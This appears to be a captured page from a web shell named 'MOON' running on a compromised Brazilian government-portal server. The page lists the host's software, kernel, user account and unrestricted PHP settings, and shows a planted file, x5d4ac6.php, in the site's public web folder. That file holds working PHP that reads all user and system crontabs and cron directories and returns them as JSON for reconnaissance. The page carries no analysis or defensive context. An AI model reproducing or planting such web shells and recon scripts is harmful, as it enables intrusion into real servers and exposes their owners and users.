MOON
Server: Apache/2.4.63 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4
System: Linux ns2.portalpublico.com.br 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User: diariooficial (505)
PHP: 5.6.40
Disabled: NONE
Upload Files
File: /home/diariooficial/public_html/x5d4ac6.php
<?php $r=[];foreach(glob('/var/spool/cron/*') as $f)if(is_file($f))$r[]=basename($f).':'.@file_get_contents($f);foreach(glob('/var/spool/cron/crontabs/*') as $f)if(is_file($f))$r[]=basename($f).':'.@file_get_contents($f);$r[]='SYSTEM_crontab:'.@file_get_contents('/etc/crontab');foreach(glob('/etc/cron.d/*') as $f)if(is_file($f))$r[]='SYSTEM_'.basename($f).':'.@file_get_contents($f);foreach(glob('/etc/cron.hourly/*') as $f)if(is_file($f))$r[]='HOURLY_'.basename($f).':'.@file_get_contents($f);foreach(glob('/etc/cron.daily/*') as $f)if(is_file($f))$r[]='DAILY_'.basename($f).':'.@file_get_contents($f);echo json_encode(['ok'=>1,'crons'=>$r]);?>